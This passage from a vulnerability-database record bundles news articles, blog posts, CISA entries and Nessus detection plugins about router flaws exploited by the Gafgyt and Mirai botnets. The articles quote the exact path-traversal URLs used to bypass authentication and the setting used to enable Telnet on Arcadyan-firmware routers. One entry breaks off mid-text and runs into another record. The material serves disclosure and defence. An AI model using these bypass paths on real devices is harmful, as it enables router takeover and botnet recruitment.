CVE-2014-8361 (in the Realtek RTL81XX chipset). However, the newest variant also targets another vulnerability, CVE-2017-18368, a remote command-injection bug on Zyxel P660HN wireless routers. 
The Zyxel P660HN-T1A (distributed by TrueOnline) has a command-injection vulnerability in the remote system log forwarding function, which can be accessed by an unauthenticated user, researchers said.\n\nAccording to Shodan, there are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.\n\n## Infection and DoS\n\nThe Gafgyt variant first uses three \u201cscanners\u201d to attempt to exploit these known RCE flaws. Then, depending on the type of device targeted, the botnet makes the device download either an ARM7 or MIPS binary using \u201cwget,\u201d which is a computer program that pulls content from web servers.\n\nFrom there, the malware connects to a command-and-control (C2) server, sending the device\u2019s information to join the botnet, such as IP address and architecture. Once enrolled, the victim device is forced to perform at least five different types of DoS attacks.\n\n\u201cThis Gafgyt variant can perform different types of DoS attacks simultaneously depending on the commands received from the C2 server,\u201d researchers said. \u201cThe main() function of the malware calls another function called processCmd() to process the command and initiate a corresponding attack.\u201d\n\nOne such attack calls the VSE function and contains a payload to attack game servers running the Valve Source Engine. Another calls the HTTPCF function to attack services secured by Cloudflare; still other options target devices that may have been previously infected with competing botnets; or, they can call the endHTTP() function to start an HTTP flooding attack.\n\n\u201cAs previously described, the VSE command starts an attack against gaming servers running the Valve Source Engine,\u201d researchers said. \u201cNote that this is not an attack on the Valve corporation itself because anyone can run a server for these games on their own network. 
It is an attack on the servers.\u201d\n\n## Instagram Distribution\n\nUpon further investigation, researchers found several fake Instagram profiles selling the source code for the botnet at a wide range of prices.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/30162826/instagram.png>)\n\nAfter going undercover and interacting with these profiles, researchers were offered a \u201cspot\u201d in the botnet servers from $8 to $150 USD. A \u201cspot\u201d means that a person can pay attackers to add a set of IP addresses against which their already-working botnets will launch a DoS attack, researchers said.\n\nResearchers say they contacted Instagram and alerted them of malicious profiles. Instagram did not respond to a request for comment from Threatpost.\n\nLooking forward, researchers said that the Gafgyt variant shows the dangers of insecure IoT devices.\n\n\u201cIn short, an increase of IoT botnets sold on Instagram + low cost + RCE exploits + the presence of wireless routers across all industries means that IoT devices are at increased risk of being recruited into botnets,\u201d said researchers. \u201cThis formula shows why every type of industry must be aware of IoT security and implement measures to prevent devices on their network from getting compromised and degrading business continuity.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free [Threatpost webinar](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>), \u201cTrends in Fortune 1000 Breach Exposure.\u201d [Click here to register](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>).**_\n", "cvss3": {}, "published": "2019-10-31T13:00:43", "type": "threatpost", "title": "Valve Source Engine, Fortnite Servers Crippled By Gafgyt Variant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2017-18368"], "modified": "2019-10-31T13:00:43", "id": "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "href": "https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T13:53:14", "description": "Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.\n\nGafgyt (a.k.a. Bashlite) is a [botnet that was first uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>). It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe latest variants have now incorporated several Mirai-based modules, according to research from Uptycs [released Thursday](<https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt>), along with new exploits. 
Mirai variants and their code re-use have become more voluminous since the source code for the IoT botnet [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\nThe capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:\n\n * HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;\n * UDP flooding, where the botnet sends several UDP packets to a victim server as a means of exhausting it;\n * Various TCP flood attacks, which abuse the normal three-way TCP handshake so that the victim server receives a heavy number of requests, resulting in the server becoming unresponsive;\n * And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.\n\n\n\nCode comparison for the HTTP DDoS module between Gafgyt and Mirai. Source: Uptycs.\n\nMeanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.\n\nThe Huawei exploit ([CVE-2017-17215](<https://nvd.nist.gov/vuln/detail/CVE-2017-17215>)) and the Realtek exploit ([CVE-2014-8361](<https://nvd.nist.gov/vuln/detail/CVE-2014-8361>)) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.\n\n\u201cThe Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using \u2018wget\u2019 command, fetches the payload,\u201d according to Uptycs. 
\u201c[It] gives the execution permission to payload using \u2018chmod\u2019 command, [and] executes the payload.\u201d\n\nThe GPON exploit ([CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>)) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.\n\n\u201cThe IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,\u201d researchers added.\n\n## **IoT Botnet Variants Abound**\n\nIoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family [to cloak its activity](<https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/>) using the Tor network.\n\nMirai hasn\u2019t disappeared either: a [new variant of the botnet](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet.\n\nIt\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>). 
Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.\n\n\u201cMalware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,\u201d Uptycs researchers said.\n\nTo protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a [FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>), \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. [Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>) for the Wed., April 21 LIVE event._**\n", "cvss3": {}, "published": "2021-04-15T16:35:53", "type": "threatpost", "title": "Gafgyt Botnet Lifts DDoS Tricks from Mirai", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2018-10561", "CVE-2021-24027"], "modified": "2021-04-15T16:35:53", "id": "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "href": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. 
For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. 
Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. 
\u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. [REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on [Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>).**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", 
"CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-09T18:34:08", "description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. 
The list of affected devices includes some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. 
In this way, it was able to quickly corral an army of small, Internet-connected "smart" devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn's Internet directory servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. 
They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T17:06:56", "type": "malwarebytes", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-08-09T17:06:56", "id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "In 
Arm Trusted Firmware M through 1.2, the NS world may trigger a system halt, an overwrite of secure data, or the printing out of secure data when calling secure functions under the NSPE handler mode. This vulnerability has known active exploitation against Yealink Device Management servers. It is assessed this product utilizes the affected Arm firmware.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arm Trusted Firmware M through 1.2 Denial-of-Service", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27562"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-27562", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Yealink Device Management Server Pre-Authorization SSRF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27561"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-27561", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. 
"cvelist": ["CVE-2019-19356"], "modified": "2022-06-01T04:16:46", "id": "C3F856DE-1DDF-5DF2-8AD1-EE7532C07200", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "seebug": [{"lastseen": "2021-07-24T16:14:55", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "seebug", "title": "D-Link DNS-320 \u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2020-25506\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25506"], "modified": "2021-03-10T00:00:00", "id": "SSV:99154", "href": "https://www.seebug.org/vuldb/ssvid-99154", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-10T19:37:10", "description": "The remote D-Link router is affected by a vulnerability. D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the router's self-reported model.", "cvss3": {}, "published": "2022-11-04T00:00:00", "type": "nessus", "title": "D-Link Routers RCE (CVE-2020-25506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-25506"], "modified": "2022-11-04T00:00:00", "cpe": [], "id": "D-LINK_ROUTER_CVE-2020-25506.NASL", "href": "https://www.tenable.com/plugins/nessus/166966", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166966);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/04\");\n\n script_name(english:\"D-Link Routers RCE (CVE-2020-25506)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote router is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote D-Link router is affected by a 
vulnerability. D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command\ninjection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the router's self-reported model.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675\");\n # https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41aae730\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to a supported device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25506\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 Tenable, Inc.\");\n\n script_dependencies(\"d-link_router_detect.nasl\");\n script_require_keys(\"www/d-link\", \"d-link/model\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http.inc');\n\nvar model = toupper(get_kb_item_or_exit('d-link/model'));\nif (model !~ \"^DNS-320$\")\n audit(AUDIT_HOST_NOT, 'an affected D-Link model');\n\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'D-Link model ' + model);\n\nvar port = get_http_port(default:80, embedded:1);\nvar items = make_array('Model', model, 'Solution', 'Upgrade to a supported device');\nvar order = make_list('Model', 'Solution');\nvar report = 
report_items_str(report_items:items, ordered_fields:order);\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-11T14:53:27", "description": "According to its banner, the Realtek Software Development Kit is running on the remote device. It is, therefore, affected by a flaw in the miniigd SOAP service due to a failure to properly sanitize user input when handling NewInternalClient requests. An unauthenticated, remote attacker, using a crafted request, can exploit this to execute arbitrary code with root level privileges.", "cvss3": {}, "published": "2015-05-01T00:00:00", "type": "nessus", "title": "Realtek SDK miniigd SOAP Service RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:realtek:realtek_sdk"], "id": "REALTEK_CVE_2014_8361.NASL", "href": "https://www.tenable.com/plugins/nessus/83185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83185);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-8361\");\n script_bugtraq_id(74330);\n script_xref(name:\"ZDI\", value:\"ZDI-15-155\");\n script_xref(name:\"EDB-ID\", value:\"37169\");\n\n script_name(english:\"Realtek SDK miniigd SOAP Service RCE\");\n script_summary(english:\"Checks the banners.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software 
